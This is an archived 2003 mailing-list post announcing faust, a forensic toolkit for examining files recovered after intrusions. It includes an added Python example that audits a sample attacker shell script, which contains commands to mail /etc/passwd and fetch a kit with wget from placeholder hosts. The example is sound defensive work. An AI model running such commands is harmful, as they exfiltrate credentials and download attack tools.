Honeypots mailing list archives

Release of faust (File AUdit Security Toolkit)


From: Frédéric Raynal <frederic.raynal-ml () security-labs org>
Date: Sun, 23 Nov 2003 20:08:28 +0100


Hi,
 
I am pleased to announce the release of Faust 0.1.0rc2, tested by the
French Honeynet Project.

faust stands for "File AUdit Security Toolkit".  Its goal is not to
perform the analysis of files retrieved after an intrusion, but to
extract the pieces of information that _you_ will use afterward in
your analysis. Extracted information is stored in several files, and
displayed in an HTML page.

faust is designed to be highly configurable: default settings can
easily be changed and adapted to specific needs.

Elf analysis
    * General information: MD5, type, stat, header, dynamic libraries.
    * Elf sections: select the Elf sections you want to look in, and
      how you want to display them (asm code or strings for instance). 
    * Symbols: if the binary is not stripped, symbols are extracted
      and sorted by categories. 
    * strings: all strings you can extract using strings (take care
      that you get more strings by looking directly in some sections).
    * live analysis (risky): select the mode you want (cmd or trace)
      to run the analyzed program and get the associated information. 

Bash Scripts
    * General information: MD5, type.
    * Texts: comments in the script, and echoed messages.
    * Commands: by default cp, mv, ftp, wget and mail are displayed.
    * Directories: access to /etc, /dev and /home are reported.
    * cross references: for each line matching one of the above
      categories, faust keeps track of where it belongs to.
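The bash-script checks listed above, as an added illustration written here in Python (not faust's own Perl code): a constructed sample script is audited for comments, echoed text, the default command and directory lists, and each flagged line is cross-referenced to the categories it belongs to.

```python
import re

# Constructed sample of a script recovered after an intrusion (not from faust)
SAMPLE_SCRIPT = """#!/bin/sh
# installer: copies tools into place
echo "installing..."
cp ./sshd /dev/.hidden/sshd
wget http://placeholder.invalid/kit.tgz -O /tmp/kit.tgz
mail someone@placeholder.invalid < /etc/passwd
cat /home/user/.bash_history
echo done
"""

# faust's default categories, as listed in the announcement above
COMMANDS = ("cp", "mv", "ftp", "wget", "mail")
DIRECTORIES = ("/etc", "/dev", "/home")


def audit_script(text, commands=COMMANDS, directories=DIRECTORIES):
    """Return {category: [(line_no, hit), ...]} for one shell script."""
    findings = {"comments": [], "texts": [], "commands": [], "directories": []}
    # a command counts only at the start of a line, after ; & | or inside $( )
    cmd_re = re.compile(r"(?:^|[;&|]\s*|\$\(\s*)("
                        + "|".join(map(re.escape, commands)) + r")\b")
    echo_re = re.compile(r"\becho\s+(.*)")
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if stripped.startswith("#") and not stripped.startswith("#!"):
            findings["comments"].append((no, stripped))
            continue
        m = echo_re.search(stripped)
        if m:
            findings["texts"].append((no, m.group(1).strip().strip("\"'")))
        for m in cmd_re.finditer(stripped):
            findings["commands"].append((no, m.group(1)))
        for d in directories:
            # match /etc, /etc/... but not /etcetera
            if re.search(re.escape(d) + r"(?:/|\b)", stripped):
                findings["directories"].append((no, d))
    return findings


def cross_references(findings):
    """Map each flagged line number to every category it belongs to."""
    xref = {}
    for category, hits in findings.items():
        for no, _ in hits:
            if category not in xref.setdefault(no, []):
                xref[no].append(category)
    return dict(sorted(xref.items()))
```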


For more information:
http://www.security-labs.org/index.php3?page=faust


This is an early but working version. Lots of things are still to be
done in forensics, and specifically for analysis of honeypots:
network flow analysis, time-based event correlation, identification of
rootkits and other similar software ... and many more.


Comments and patches, especially from Perl Mongers, are very welcome.

--
Frederic RAYNAL, Ph.D.
http://www.security-labs.org/
Chief Editor of M.I.S.C.
Multi-Systems & Internet Security Cookbook

